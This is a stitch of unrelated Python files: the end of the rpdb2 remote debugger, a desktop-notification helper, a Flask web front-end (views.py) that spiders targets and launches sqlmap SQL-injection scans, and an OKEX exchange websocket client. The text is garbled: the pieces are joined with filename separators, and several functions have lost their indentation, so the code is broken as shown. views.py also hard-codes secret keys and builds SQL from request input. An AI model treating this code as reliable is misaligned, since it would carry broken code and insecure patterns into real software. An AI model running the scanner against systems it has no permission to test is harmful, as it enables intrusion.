    if type(n) == int:
        g_fos_exit = (setbreak() != None)
    #
    # os._exit(n) has been called.
    #
    # Stepping on from this point will result
    # in program termination.
    #
    return g_os_exit(n)
g_os_exit = None
if __name__ == 'rpdb2' and '_exit' in dir(os) and os._exit != __exit:
    g_os_exit = os._exit
    os._exit = __exit
def __close(fd):
    # Wrapper installed over os.close(): break into the debugger if the
    # script is about to close the debugger's communication socket.
    global g_fos_exit
    try:
        if fd == g_server.m_server.socket._sock.fileno():
            g_fos_exit = (setbreak() != None)
    except:
        # fd comparison is best effort only (e.g. no server yet).
        pass
    #
    # os.close(fd) has been called by the debugged script to close
    # the debugger communication channel.
    #
    # This can normally happen if it is trying to spawn a new process
    # in its place.
    #
    # Stepping on from this point will result in termination of the
    # debugging session.
    #
    return g_os_close(fd)
g_os_close = None
if __name__ == 'rpdb2' and 'close' in dir(os) and os.close != __close:
    g_os_close = os.close
    os.close = __close
def __dup2(fd, fd2):
    # Wrapper installed over os.dup2(): break into the debugger if the
    # target descriptor is the debugger's communication socket.
    global g_fos_exit
    try:
        if fd2 == g_server.m_server.socket._sock.fileno():
            g_fos_exit = (setbreak() != None)
    except:
        # fd comparison is best effort only (e.g. no server yet).
        pass
    #
    # os.dup2(fd, fd2) has been called by the debugged script to close
    # the debugger communication channel.
    #
    # This can normally happen if it is trying to spawn a new process
    # in its place.
    #
    # Stepping on from this point will result in termination of the
    # debugging session.
    #
    return g_os_dup2(fd, fd2)
g_os_dup2 = None
if __name__ == 'rpdb2' and 'dup2' in dir(os) and os.dup2 != __dup2:
    g_os_dup2 = os.dup2
    os.dup2 = __dup2
def __execv(path, args):
    # Wrapper installed over os.execv(): break into the debugger before the
    # process image is replaced.
    global g_exectid
    if os.path.isfile(path) and not g_fignorefork:
        g_exectid = setbreak()
    #
    # os.execv() has been called.
    #
    # Stepping on from this point will result
    # in termination of the debug session if
    # the exec operation completes successfully.
    #
    return g_os_execv(path, args)
g_os_execv = None
if __name__ == 'rpdb2' and 'execv' in dir(os) and os.execv != __execv:
    g_os_execv = os.execv
    os.execv = __execv
def __execve(path, args, env):
    # Wrapper installed over os.execve(): break into the debugger before
    # the process image is replaced (same as __execv, with an environment).
    global g_exectid
    if os.path.isfile(path) and not g_fignorefork:
        g_exectid = setbreak()
    #
    # os.execve() has been called.
    #
    # Stepping on from this point will result
    # in termination of the debug session if
    # the exec operation completes successfully.
    #
    return g_os_execve(path, args, env)
g_os_execve = None
if __name__ == 'rpdb2' and 'execve' in dir(os) and os.execve != __execve:
    g_os_execve = os.execve
    os.execve = __execve
def __excepthook(type, value, traceback, next_excepthook, index):
    # Debugger link in the chained sys.excepthook (see set_excepthook()).
    # Only the LAST installed hook traps; earlier ones just delegate.
    if index + 1 < len(g_excepthooks):
        return next_excepthook(type, value, traceback)
    # Exceptions raised at the outermost frame are handled elsewhere.
    if traceback.tb_frame.f_back == None:
        return next_excepthook(type, value, traceback)
    # Respect the user's 'trap unhandled exceptions' setting.
    if not g_debugger.m_ftrap:
        return next_excepthook(type, value, traceback)
    settrace()
    ctx = g_debugger.get_ctx(thread.get_ident())
    ctx.m_fUnhandledException = True
    setbreak()
    #
    # Debuggee breaks (pauses) here
    # on unhandled exceptions.
    # Use analyze mode for post mortem.
    # type 'help analyze' for more information.
    #
    return next_excepthook(type, value, traceback)
# Chain of installed hooks, and the most recently installed one.
g_excepthooks = []
g_excepthook = None
#
# Set the debugger hook for unhandled exceptions. It only kicks in on
# unhandled exceptions that are declared unhandled in the middle of the
# stack as in wxPython. Normally unhandled exceptions are trapped at the
# last stack frame by another mechanism.
#
# This mechanism is designed to work even if the excepthook is over-written
# by the debugged script.
#
def set_excepthook():
    """Chain a debugger hook in front of the current sys.excepthook.

    May be called repeatedly when the debugged script overwrites
    sys.excepthook; gives up after four overwrites.
    """
    global g_excepthook
    if len(g_excepthooks) >= 4:
        # Over-written 4 times already - give up.
        return
    previous_hook = sys.excepthook
    position = len(g_excepthooks)
    def hook(type, value, traceback):
        return __excepthook(type, value, traceback, previous_hook, position)
    g_excepthooks.append(hook)
    g_excepthook = hook
    sys.excepthook = hook
def __function_wrapper(function, args, kwargs):
    # Entry point for threads started through the wrapped
    # thread.start_new_thread(): enable tracing before the user function runs.
    __settrace(depth = 1)
    #
    # Debuggee breaks (pauses) here
    # on unhandled exceptions.
    # Use analyze mode for post mortem.
    # type 'help analyze' for more information.
    #
    return function(*args, **kwargs)
def __start_new_thread(function, args, kwargs = {}):
    # Wrapper installed over thread.start_new_thread(). The mutable default
    # is safe here: kwargs is only passed through, never mutated.
    return g_thread_start_new_thread(__function_wrapper, (function, args, kwargs))
g_thread_start_new_thread = None
if __name__ == 'rpdb2' and 'start_new_thread' in dir(thread) and thread.start_new_thread != __start_new_thread:
    g_thread_start_new_thread = thread.start_new_thread
    thread.start_new_thread = __start_new_thread
#
# ---------------------------------------- main ------------------------------------
#
def __settrace(depth = 2):
    """Start debugger tracing at the caller's frame (no break on init).
    No-op when the debugger engine has not been created yet."""
    if g_debugger is None:
        return
    caller = sys._getframe(depth)
    g_debugger.settrace(caller, f_break_on_init = False)
def __setbreak(depth = 2):
    """Break the debuggee at the caller's frame and return the calling
    thread's id; returns None when no debugger engine exists."""
    if g_debugger is None:
        return
    caller = sys._getframe(depth)
    g_debugger.setbreak(caller)
    return thread.get_ident()
def __set_temp_breakpoint(path, scopename, lineno):
    # Forward to the breakpoint manager of the global debugger engine.
    return g_debugger.m_bp_manager.set_temp_breakpoint(path, scopename, lineno)
def _atexit(fabort = False):
    # Process-exit cleanup registered with atexit: notify the console and
    # shut down the debugger server/engine. With fabort, hard-kill the
    # process afterwards.
    if g_fignore_atexit:
        return
    print_debug("Entered _atexit() in pid %d" % _getpid())
    if g_debugger is None:
        return
    if not fabort:
        g_debugger.stoptrace()
    g_debugger.send_event_exit()
    # Give the exit event a moment to reach the console before shutdown.
    time.sleep(1.0)
    g_server.shutdown()
    g_debugger.shutdown()
    if not fabort:
        return
    # Abort path: terminate without running further cleanup.
    if hasattr(os, 'kill') and hasattr(signal, 'SIGKILL'):
        os.kill(os.getpid(), signal.SIGKILL)
    else:
        os.abort()
def my_pickle_import(*args, **kwargs):
    """Import hook handed to pickle: behaves like __import__ except that it
    refuses to import 'rpdb2' (returns None), breaking an import deadlock.

    A 'name' keyword argument takes precedence over the first positional
    argument, matching the original lookup order.
    """
    name = args[0] if len(args) > 0 else ''
    name = kwargs.get('name', name)
    if name == 'rpdb2':
        return None
    return __import__(*args, **kwargs)
#
# MOD
#
def workaround_import_deadlock():
    # Pre-warm the pickle/xmlrpclib machinery so their lazy imports do not
    # deadlock later while the debugger holds the import lock.
    if is_py3k() and hasattr(pickle, '_Pickler'):
        # Force the pure-Python pickler on py3k.
        pickle.Pickler = pickle._Pickler
    xmlrpclib.loads(XML_DATA)
    s = as_bytes("(S'hello'\np0\nS'world'\np1\ntp2\n.")
    #s = as_bytes('(S\'\\xb3\\x95\\xf9\\x1d\\x105c\\xc6\\xe2t\\x9a\\xa5_`\\xa59\'\np0\nS"(I0\\nI1\\nS\'5657827\'\\np0\\n(S\'server_info\'\\np1\\n(tI0\\ntp2\\ntp3\\n."\np1\ntp2\n.0000000')
    pickle.loads(s)
    # Block any future attempt by pickle to import rpdb2 itself.
    pickle.__import__ = my_pickle_import
def __start_embedded_debugger(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, timeout, source_provider, fDebug, depth):
    # Create (once) and start the embedded debugger engine + debuggee
    # server, then begin tracing the caller's frame. Serialized with
    # g_server_lock; subsequent calls only re-arm tracing or break.
    global g_server
    global g_debugger
    global g_fDebug
    global g_initial_cwd
    global g_source_provider_aux
    _rpdb2_pwd = as_unicode(_rpdb2_pwd)
    try:
        g_server_lock.acquire()
        if g_debugger is not None and timeout == 0:
            # Already initialized: just resume tracing at the caller.
            f = sys._getframe(depth)
            g_debugger.settrace(f, f_break_on_init = False)
            return
        if g_debugger is not None:
            # Already initialized with a timeout: break at the caller.
            f = sys._getframe(depth)
            g_debugger.record_client_heartbeat(0, True, False)
            g_debugger.setbreak(f)
            return
        if not is_valid_pwd(_rpdb2_pwd):
            raise BadArgument(STR_PASSWORD_BAD)
        g_fDebug = fDebug
        g_source_provider_aux = source_provider
        workaround_import_deadlock()
        if (not fAllowUnencrypted) and not is_encryption_supported():
            raise EncryptionNotSupported
        f = sys._getframe(depth)
        filename = calc_frame_path(f)
        #
        # This is an attempt to address the Python problem of recording only
        # relative paths in __file__ members of modules in the following case.
        #
        if sys.path[0] == '':
            try:
                g_initial_cwd = [getcwd(), getcwdu()]
            except UnicodeDecodeError:
                #
                # This exception can be raised in py3k (alpha) on nt.
                #
                g_initial_cwd = [getcwdu()]
        atexit.register(_atexit)
        g_debugger = CDebuggerEngine(fembedded = True)
        g_server = CDebuggeeServer(filename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote)
        g_server.start()
        if timeout == 0:
            g_debugger.settrace(f, f_break_on_init = False)
            return
        # Wait up to 'timeout' for a console to attach.
        g_debugger.settrace(f, timeout = timeout)
    finally:
        g_server_lock.release()
def StartServer(args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
    # Debuggee-side entry point: set up the debugger engine + server, then
    # run the target script (args[0]) as __main__ under tracing.
    assert(is_unicode(_rpdb2_pwd))
    global g_server
    global g_debugger
    global g_module_main
    try:
        ExpandedFilename = FindFile(args[0])
        _path = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
        if fchdir:
            os.chdir(os.path.dirname(_path))
        if ExpandedFilename in g_found_unicode_files:
            # Load unicode-named scripts via a path relative to the cwd.
            prefix = os.path.join(getcwdu(), '')
            _path = _path.replace(winlower(prefix), '')
    except IOError:
        _print('File ' + args[0] + ' not found.')
        return
    print_debug('Starting server with: %s' % ExpandedFilename)
    workaround_import_deadlock()
    #
    # Replace the rpdb2.py directory with the script directory in
    # the search path
    #
    spe = ExpandedFilename
    if os.path.islink(ExpandedFilename):
        spe = os.path.realpath(ExpandedFilename)
    sys.path[0] = os.path.dirname(spe)
    encoding = detect_locale()
    argv = [as_string(arg, encoding) for arg in args]
    sys.argv = argv
    atexit.register(_atexit)
    g_debugger = CDebuggerEngine()
    g_server = CDebuggeeServer(ExpandedFilename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
    g_server.start()
    try:
        # Best effort: arrange to stop at the script's first line.
        g_debugger.m_bp_manager.set_temp_breakpoint(ExpandedFilename, '', 1, fhard = True)
    except:
        pass
    f = sys._getframe(0)
    g_debugger.settrace(f, f_break_on_init = False, builtins_hack = ExpandedFilename)
    g_module_main = -1
    del sys.modules['__main__']
    #
    # An exception in this line occurs if
    # there is a syntax error in the debugged script or if
    # there was a problem loading the debugged script.
    #
    imp.load_source('__main__', _path)
def StartClient(command_line, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
    """Console-side entry point: create a session manager and an interactive
    console, optionally attach to / launch the given command line, and run
    until the console exits. Returns 2 on encryption-support errors."""
    assert(is_unicode(command_line))
    assert(_rpdb2_pwd == None or is_unicode(_rpdb2_pwd))
    if (not fAllowUnencrypted) and not is_encryption_supported():
        _print(STR_ENCRYPTION_SUPPORT_ERROR)
        return 2
    session_manager = CSessionManager(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
    console = CConsole(session_manager)
    console.start()
    time.sleep(1.0)
    try:
        if fAttach:
            session_manager.attach(command_line)
        elif command_line != '':
            session_manager.launch(fchdir, command_line)
    except (socket.error, CConnectionException):
        session_manager.report_exception(*sys.exc_info())
    except CException:
        session_manager.report_exception(*sys.exc_info())
    except:
        session_manager.report_exception(*sys.exc_info())
        print_debug_exception(True)
    console.join()
    session_manager.shutdown()
def PrintUsage(fExtended = False):
# Print the command-line usage banner for the rpdb2 script; when fExtended
# is true, also print the module docstring with the full documentation.
scriptName = os.path.basename(sys.argv[0])
_print(""" %(rpdb)s [options] [<script-name> [<script-args>...]]
%(rpdb)s uses the client-server model where the debugger UI/console is
the client and the debugged script is the server (also called debuggee).
The client and the server are separate processes and communicate over
sockets.
Example: The following command starts the debugger UI/console and then
launches and attaches to the specified script:
%(rpdb)s some_script.py
Options can be a combination of the following:
-h, --help Print this help.
-d, --debuggee Start the debugged script (server) and wait for a
debugger console (client) to attach.
-a, --attach Start the debugger console (client) and attach to the
specified debugged script (server).
-o, --host= Specify host (or IP address) for remote connections.
-r, --remote Allow debuggees to accept connections from remote machines.
-e, --encrypt Force encrypted socket communication.
-p, --pwd= Specify password for socket communication.
This flag is available only on Windows. On other
systems the password will be queried interactively
if it is needed.
-s, --screen Use the Unix screen utility when starting the debuggee.
Note that the debugger should be started as follows:
screen rpdb2 -s [options] [<script-name> [<script-args>...]]
-c, --chdir Change the working directory to that of the launched
script.
-v, --version Print version information.
--debug Debug prints.
Note that each option is available in short form (example -e) and in a
long form (example --encrypt).
Options that end with '=' accept an argument that should follow without
a space. For example to specify 192.168.0.10 as host use the following
option:
long form: --host=192.168.0.10
short form: -o192.168.0.10
""" % {"rpdb": scriptName})
if not fExtended:
return
_print(__doc__)
def main(StartClient_func = StartClient, version = RPDB_TITLE):
# Command-line entry point. Parses options, validates their combination,
# and dispatches to exactly one of four mutually exclusive modes:
#   fWrap   - start the debuggee server (--debuggee)
#   fAttach - attach a console to a running debuggee (--attach)
#   fSpawn  - launch a script and attach to it (script name given)
#   fStart  - start an idle console (no arguments)
# Returns 0 on success and 2 on usage errors.
global g_fScreen
global g_fDebug
global g_fFirewallTest
create_rpdb_settings_folder()
encoding = detect_locale()
argv = [as_unicode(arg, encoding) for arg in sys.argv]
try:
options, _rpdb2_args = getopt.getopt(
argv[1:],
'hdao:rtep:scv',
['help', 'debugee', 'debuggee', 'attach', 'host=', 'remote', 'plaintext', 'encrypt', 'pwd=', 'rid=', 'screen', 'chdir', 'base64=', 'nofwtest', 'version', 'debug']
)
except getopt.GetoptError:
PrintUsage()
return 2
fWrap = False
fAttach = False
fSpawn = False
fStart = False
encoded_path = None
secret = None
host = None
_rpdb2_pwd = None
fchdir = False
fAllowRemote = False
fAllowUnencrypted = True
# Note: '--debugee' is accepted as a (misspelled) alias of '--debuggee'.
for o, a in options:
if o in ['-h', '--help']:
PrintUsage()
return 0
if o in ['-v', '--version']:
_print(version)
return 0
if o in ['--debug']:
g_fDebug = True
if o in ['-d', '--debugee', '--debuggee']:
fWrap = True
if o in ['-a', '--attach']:
fAttach = True
if o in ['-o', '--host']:
host = a
if o in ['-r', '--remote']:
fAllowRemote = True
if o in ['-t', '--plaintext']:
fAllowUnencrypted = True
if o in ['-e', '--encrypt']:
fAllowUnencrypted = False
if o in ['-p', '--pwd']:
_rpdb2_pwd = a
if o in ['--rid']:
secret = a
if o in ['-s', '--screen']:
g_fScreen = True
if o in ['-c', '--chdir']:
fchdir = True
if o in ['--base64']:
encoded_path = a
if o in ['--nofwtest']:
g_fFirewallTest = False
# Clear parsing temporaries; presumably so no stale references remain in
# this frame while the debugger runs -- TODO confirm.
arg = None
argv = None
options = None
o = None
a = None
# Validate option combinations; each failure prints a reason and returns 2.
if (_rpdb2_pwd is not None) and (os.name != 'nt'):
_print(STR_PASSWORD_NOT_SUPPORTED)
return 2
if _rpdb2_pwd is not None and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_BAD)
return 2
if fWrap and (len(_rpdb2_args) == 0):
_print("--debuggee option requires a script name with optional <script-arg> arguments")
return 2
if fWrap and fAttach:
_print("--debuggee and --attach can not be used together.")
return 2
if fAttach and (len(_rpdb2_args) == 0):
_print("--attach option requires a script name to attach to.")
return 2
if fAttach and (len(_rpdb2_args) > 1):
_print("--attach option does not accept <script-arg> arguments.")
return 2
if fAttach and fAllowRemote:
_print("--attach and --remote can not be used together.")
return 2
if (host is not None) and not fAttach:
_print("--host can only be used together with --attach.")
return 2
if host is None:
host = LOCALHOST
fSpawn = (len(_rpdb2_args) != 0) and (not fWrap) and (not fAttach)
fStart = (len(_rpdb2_args) == 0)
if fchdir and not (fWrap or fSpawn):
_print("-c can only be used when launching or starting a script from command line.")
return 2
# Exactly one of the four modes must be selected at this point.
assert (fWrap + fAttach + fSpawn + fStart) == 1
# On POSIX, a numeric attach target is treated as an rid whose password is
# read from (and then removed with) the matching password file.
if fAttach and (os.name == POSIX):
try:
int(_rpdb2_args[0])
_rpdb2_pwd = read_pwd_file(_rpdb2_args[0])
delete_pwd_file(_rpdb2_args[0])
except (ValueError, IOError):
pass
if (secret is not None) and (os.name == POSIX):
_rpdb2_pwd = read_pwd_file(secret)
# Debuggee/attach modes require a password; prompt until a valid one is
# entered.
if (fWrap or fAttach) and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_MUST_BE_SET)
while True:
_rpdb2_pwd = _raw_input(STR_PASSWORD_INPUT)
if is_valid_pwd(_rpdb2_pwd):
break
_print(STR_PASSWORD_BAD)
_print(STR_PASSWORD_CONFIRM)
if fWrap or fSpawn:
try:
# --base64 smuggles the script path through a filesystem-safe encoding.
if encoded_path != None:
_b = as_bytes(encoded_path).translate(g_safe_base64_from)
_u = base64.decodestring(_b)
_path = as_unicode(_u)
_rpdb2_args[0] = _path
FindFile(_rpdb2_args[0])
except IOError:
_print(STR_FILE_NOT_FOUND % _rpdb2_args[0])
return 2
if fWrap:
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
StartServer(_rpdb2_args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, secret)
elif fAttach:
StartClient_func(_rpdb2_args[0], fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
elif fStart:
StartClient_func(as_unicode(''), fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
else:
# fSpawn: quote each argument and hand the whole command line to the client.
if len(_rpdb2_args) == 0:
_rpdb2_args = ''
else:
_rpdb2_args = '"' + '" "'.join(_rpdb2_args) + '"'
StartClient_func(_rpdb2_args, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
return 0
if __name__ == '__main__':
# rpdb2 imports itself here so the debugger machinery operates on the
# proper module object rather than on '__main__'.
import rpdb2
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
ret = rpdb2.main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
pluginmanager.py | #!/usr/bin/env python
import functools
def notify_stdout(msg, key=None, **kwargs):
    """Fallback notifier: write *msg* to stdout.

    `key` and any extra keyword arguments are accepted for interface
    parity with notify_libnotify but are ignored.
    """
    # Parenthesized form works identically on Python 2 (single argument)
    # and Python 3; the original bare print statement was Python 2 only.
    print(msg)
# Maps notification key -> last libnotify notification id, so repeated
# notifications for the same key replace the previous popup instead of
# stacking new ones.
libnotify_ids = {}
def notify_libnotify(msg, key=None, timeout=1000, **kwargs):
# Show *msg* via the org.freedesktop.Notifications D-Bus service,
# falling back to notify_stdout when the session bus is unavailable.
import dbus, wmiidbus
try:
session_bus = wmiidbus.get_session_bus(start_thread=False)
except:
# Deliberate best-effort: any failure to reach the bus degrades to stdout.
return notify_stdout(msg, key, **kwargs)
proxy = session_bus.get_object('org.freedesktop.Notifications', '/org/freedesktop/Notifications')
notifications = dbus.Interface(proxy, 'org.freedesktop.Notifications')
# NOTE(review): 'id' shadows the builtin; left unchanged here.
id = libnotify_ids.get(key, 0)
id = notifications.Notify('purple-DBus-Example-2-libnotify', id, '', '', msg, [], {}, timeout)
if key is not None:
libnotify_ids[key] = id
# Default notifier used by the rest of the module.
notify = notify_libnotify
def notify_exception(arg):
    """
    Decorator to catch unhandled exceptions and display some info.
    Exceptions are re-raised to allow normal exception handling to occur.

    Usable either bare (@notify_exception) or with a comment string
    (@notify_exception("while saving")) that is included in the message.
    """
    comment = None

    def wrap1(f):
        @functools.wraps(f)
        def wrap2(*args, **kwargs):
            try:
                return f(*args, **kwargs)
            except Exception as e:
                # An inner notify_exception wrapper already reported this
                # exception: just propagate it without notifying again.
                if getattr(e, 'notified', False):
                    raise
                if comment:
                    notify('%s %s: %s' % (e.__class__.__name__, comment, e))
                else:
                    notify('%s: %s' % (e.__class__.__name__, e))
                e.notified = True  # Prevent duplicate notifications upstream
                raise
        return wrap2

    if isinstance(arg, str):
        comment = arg
        return wrap1
    # No comment was passed in, so we need one less level of indirection
    # (arg is the function being decorated).
    return wrap1(arg)
def async(func):
# Decorator: run *func* on a freshly created thread and return immediately.
# NOTE(review): 'async' became a reserved keyword in Python 3.7, so this
# module cannot load on modern Python unless the decorator is renamed.
@functools.wraps(func)
def wrap(*args, **kwargs):
import threading
# Thread.start() returns None, so the wrapper always returns None.
return threading.Thread(target=func, args=args, kwargs=kwargs).start()
return wrap
|
views.py | #!/usr/bin/env python
#!-*- coding:utf-8 -*-
import json
import threading
import multiprocessing
import requests
from flask import Flask,render_template,request,session,jsonify,redirect
from libs.action import SqlMapAction,Spider_Handle,Save_Success_Target
from libs.func import Tools
from libs.models import MySQLHander
from libs.action import Action
from libs.proxy import run_proxy
app = Flask(__name__)
# Module-level DB handle (individual views also create their own handlers).
mysql = MySQLHander()
app.config.update(dict(
DEBUG=True,
SECRET_KEY="546sdafwerxcvSERds549fwe8rdxfsaf98we1r2"
))
# Optional override of the settings above from an environment-named file.
app.config.from_envvar('AUTOSQLI_SETTINGS', silent=True)
# NOTE(review): hard-coded secret keys and DEBUG=True are unsafe outside of
# local development; this assignment also overrides SECRET_KEY set above.
app.secret_key = "34$#4564dsfaWEERds/*-()^=sadfWE89SA"
# Shared sqlmap API wrapper used by the task views below.
SqlMap = SqlMapAction()
@app.route('/')
def index():
    """Serve the landing page."""
    page = render_template('index.html')
    return page
@app.route('/index')
def settings_views():
    """Alias route: serve the same landing page as '/'."""
    page = render_template('index.html')
    return page
@app.route('/settings', methods=['GET', 'POST'])
def settings_settings_info():
    """Serve the settings/info page (same template for GET and POST)."""
    return render_template('info.html')
#TODO user=session['user']
@app.route('/action/startask', methods=['GET', 'POST'])
def action_startask():
    """Create a new scan task.

    GET renders the task-creation form. POST clears previously registered
    sqlmap tasks, converts the submitted form into sqlmap options, updates
    the global scanner settings, and launches the spider and the
    result-collector as background threads before redirecting to the task
    list. (Two unreachable 'alert' returns that followed the redirect in
    the original were removed.)
    """
    if request.method == 'GET':
        return render_template('startask.html')
    # Delete previously registered sqlmap tasks before starting a new batch.
    SqlMap.DeleteAllTask()
    # Translate the submitted form fields into sqlmap options.
    options = Tools.do_sqlmap_options(request.form)
    # Refresh global scanner settings from this request.
    SqlMap.update_settings(request)
    # Fire-and-forget worker threads (intentionally not joined).
    t = threading.Thread(target=Spider_Handle, args=(request.form['target'], options))
    t.start()
    t = threading.Thread(target=Save_Success_Target, args=())
    t.start()
    return redirect('/action/showtask')
@app.route('/action/showtask', methods=['GET'])
def action_showtask():
    """Show the task list, or serve its JSON data endpoints.

    ?action=refresh        -> JSON {"number": N, "data": [task rows]}
    ?type=log&taskid=ID    -> JSON sqlmap scan log for the task
    ?type=payload&taskid=ID-> JSON sqlmap scan data for the task
    otherwise              -> the showtask.html page
    """
    data = {"number": 0, "data": []}
    # Membership test replaces Python-2-only MultiDict.has_key().
    if request.args.get('action') == "refresh":
        # Local handler renamed so it does not shadow the module-level
        # 'mysql' handle.
        db = MySQLHander()
        sql = "select taskid,target,success,status from task"
        db.query(sql)
        source = db.fetchAllRows()
        for line in source:
            data['data'].append({"taskid": line[0], "target": line[1],
                                 "success": line[2], "status": line[3]})
        data['number'] = len(data['data'])
        db.close()
        return json.dumps(data)
    if 'type' in request.args:
        if request.args['type'] == "log":
            sqlaction = SqlMapAction()
            server = sqlaction._get_server()
            url = "{0}/scan/{1}/log".format(server, request.args['taskid'])
            return json.dumps(Tools.getjsondata(url))
        if request.args['type'] == "payload":
            sqlaction = SqlMapAction()
            server = sqlaction._get_server()
            url = "{0}/scan/{1}/data".format(server, request.args['taskid'])
            return json.dumps(Tools.getjsondata(url))
    return render_template('showtask.html')
@app.route('/action/showdetail', methods=['GET'])
def action_showjson():
    """Return the detail of a single task as JSON.

    Fixes over the original: the SQL was missing its 'from task' clause,
    and 'status' was read from index 4 although only four columns
    (indices 0-3) are selected.
    """
    data = {"target": "", "data": "", "success": 0, "status": "running"}
    # Membership test replaces Python-2-only MultiDict.has_key().
    if 'taskid' in request.args:
        taskid = request.args['taskid']
        # NOTE(review): interpolating user input into SQL is
        # injection-prone; switch to parameterized queries if MySQLHander
        # supports them.
        sql = "select target,data,success,status from task where taskid = '{0}'".format(taskid)
        db = MySQLHander()
        db.query(sql)
        resource = db.fetchOneRow()
        data = {"target": resource[0], "data": resource[1],
                "success": resource[2], "status": resource[3]}
    return json.dumps(data)
@app.route('/action/stoptask')
def action_status():
    """Stop one or more tasks; ?taskidlist= is a comma-separated id list."""
    raw = request.args['taskidlist']
    if raw != "":
        # str.split handles both a single id and a comma-separated list;
        # the original special-cased find(',') > 0, which mishandled a
        # list starting with a comma.
        taskidlist = raw.split(',')
        return json.dumps({"status": SqlMap.StopTask(taskidlist)})
    return json.dumps({"error": "no taskid"})
if __name__ == '__main__':
app.run() |
vnokex.py | # encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
# OKEX websocket endpoints
OKEX_USD_SPOT = 'wss://real.okex.com:10441/websocket' # OKEX spot address
#OKEX_USD_SPOT = 'wss://47.90.109.236:10441/websocket' # OKEX spot address
#OKEX_USD_SPOT = 'wss://ws.blockchain.info/inv' # OKEX spot address
OKEX_USD_CONTRACT = 'wss://real.okex.com:10440/websocket/okexapi' # OKEX futures address
# Currencies supported on the spot market.
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch"]
# Tradable spot symbol pairs.
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt"]
# Supported candlestick (kline) periods.
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
# Futures contract underlyings.
CONTRACT_SYMBOL = ["btc",
"ltc",
"eth",
"etc",
"bch"]
# Futures contract maturities.
CONTRACT_TYPE = ["this_week",
"next_week",
"quarter"]
########################################################################
class OkexApi(object):
    """Trading API base: websocket connection management and request
    plumbing shared by the spot and futures interfaces.

    Fixes over the original: sendTradingRequest no longer raises a
    NameError on an unbound 'j' when signing fails; Python-2-only
    'print'/'except' syntax was replaced with forms valid on 2 and 3;
    the deprecated Thread.isAlive() alias was replaced by is_alive();
    connect/reconnect share one helper instead of duplicated code.
    """

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.host = ''          # server address
        self.apiKey = ''        # API key ("user name")
        self.secretKey = ''     # secret key used for signing
        self.ws = None          # websocket application object
        self.thread = None      # thread running the websocket loop

    #----------------------------------------------------------------------
    def _start_websocket(self):
        """Create the websocket app and run it on a background thread."""
        self.ws = websocket.WebSocketApp(self.host,
                                         on_message=self.onMessage,
                                         on_error=self.onError,
                                         on_close=self.onClose,
                                         on_open=self.onOpen)
        # run_forever positional args: everything default except a
        # 25-second ping interval (mirrors the original call exactly).
        self.thread = Thread(target=self.ws.run_forever,
                             args=(None, None, 25, None, None, None,
                                   None, None, False, None, None))
        self.thread.start()

    #----------------------------------------------------------------------
    def reconnect(self):
        """Close any existing connection, then connect again."""
        self.close()
        self._start_websocket()

    #----------------------------------------------------------------------
    def connect(self, apiKey, secretKey, trace=False):
        """Connect to the OKEX spot endpoint with the given credentials."""
        self.host = OKEX_USD_SPOT
        self.apiKey = apiKey
        self.secretKey = secretKey
        websocket.enableTrace(trace)
        self._start_websocket()

    #----------------------------------------------------------------------
    def readData(self, evt):
        """Decode a pushed JSON message into Python data."""
        data = json.loads(evt)
        return data

    #----------------------------------------------------------------------
    def close(self):
        """Close the websocket and wait for the worker thread to exit."""
        if self.thread and self.thread.is_alive():
            self.ws.close()
            self.thread.join()

    #----------------------------------------------------------------------
    def onMessage(self, ws, evt):
        """Message push callback."""
        print(evt)

    #----------------------------------------------------------------------
    def onError(self, ws, evt):
        """Error push callback."""
        print('onError')
        print(evt)

    #----------------------------------------------------------------------
    def onClose(self, ws):
        """Connection closed callback."""
        print('onClose')

    #----------------------------------------------------------------------
    def onOpen(self, ws):
        """Connection opened callback."""
        print('onOpen')

    #----------------------------------------------------------------------
    def generateSign(self, params):
        """Generate the MD5 request signature over sorted parameters."""
        l = []
        for key in sorted(params.keys()):
            l.append('%s=%s' %(key, params[key]))
        l.append('secret_key=%s' %self.secretKey)
        sign = '&'.join(l)
        return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()

    #----------------------------------------------------------------------
    def sendTradingRequest(self, channel, params):
        """Send a signed trading request on *channel*."""
        try:
            # Add api_key and signature to the parameter dict.
            params['api_key'] = self.apiKey
            params['sign'] = self.generateSign(params)
            # Build the request.
            d = {}
            d['event'] = 'addChannel'
            d['channel'] = channel
            d['parameters'] = params
            # Serialize with json before sending.
            j = json.dumps(d)
            print(d)
        except Exception as e:
            print(e)
            # Signing/serialization failed: there is nothing to send.
            # (The original fell through and hit an unbound 'j'.)
            return
        try:
            self.ws.send(j)
        except websocket.WebSocketConnectionClosedException:
            pass

    #----------------------------------------------------------------------
